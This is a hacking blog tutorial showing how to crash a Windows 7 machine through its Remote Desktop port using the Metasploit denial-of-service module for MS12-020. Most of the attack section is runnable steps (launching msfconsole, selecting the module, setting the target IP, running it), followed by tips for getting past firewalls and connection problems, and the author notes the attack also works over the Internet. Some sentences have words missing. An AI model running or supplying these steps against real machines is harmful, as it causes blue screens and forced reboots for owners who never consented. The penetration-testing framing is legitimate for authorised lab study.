Home / Hacking / Penetration Testing Windows 7 Machine for Remote Desktop Vulnerability

Penetration Testing Windows 7 Machine for Remote Desktop Vulnerability

Penetration Testing Windows 7 by Crashing the Machine using Remote Desktop Connection  Vulnerabilty .

This is a for Penetration Testing the windows 7 machine for the remote desktop connection Vulnerability using everyone’s favourite exploitation Framework , . Earliar there were exploits for the unpatched XP Machines but in modern Operating Systems such as Windows 7 , there arent any such magical exploits . Generally penetration testing tutorials show the penetration testing on Windows XP Machine , but that is long gone OS , Hackingloops brings you a Penetration Testing Tutorial on Windows 7 Machine .

Generally we have seen Client side Exploits and payloads all the time for Windows 7 , Toolkit is great for such attacks . However Windows 7 still has a Vulnerabilty living in it , in the RDP (Remote Desktop Protocol) Port 3389 which is accessible over the LAN and the Internet . Over the Internet this is a little complicated due to the need of , over the LAN this attack is as easy as a piece of cake .

All you need to do this is a Kali machine and a Victim Windows 7 Machine .

Penetration testing Windows 7 with Kali Linux

Lets begin the tutorial for a scenario where the Victim Windows 7 Machine is over LAN . All we need to get started is Windows 7 machines IP Address which you can easily get either by NMAP or IPCONFIG command (just in case you are practicing and you have the access to windows 7 Machine)

 Start MeTaSploit : msfconsole

Next we need to select the exploit that we are planing to use i.e ms12_020_maxchannelids

Command : use auxillary/dos/windows/rdp/ms12_020_maxchannelids

Now if you dont know what options this exploit needs then type the command ” show options ” in msfconsole . This will present you with all the options this exploit needs to be set .

Set the Remote Host Ip Address :

Command : set RHOST <Vict-windows 7 IP>

And you are done !! .

Just type “exploit”

The Target machine will get a Blue screen and the machine will crash if all went right . And the Machine will REBOOT . This can be done over the Internet too !!! .

 If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Also another problem that could be is that the Attacker Kali machine and the Victim Windows 7 Machine are not communicating which can be checked by Pinging . Make sure that remote Desktop is enabled on the Windows 7 Machine.

To enable Remote Desktop : Go to System (Control Panel\System and Security\System). Click on Remote settings. Select the “Allow Remote Connections to this computer” button and Click ok.

About Vanshit Malhotra

Ethical Hacker | Cyber Forensics Investigator | Information Security Consultant Expert at security tactics orchestrating operations to fit strategy. With a 3 + years of experience in various domains of Information Security , I have been able to solve very complex security problems across many technologies and then teach and enable the clients to do the same. #Please Like , Share and Comment if our Posts are helpful to you .

Leave a Comment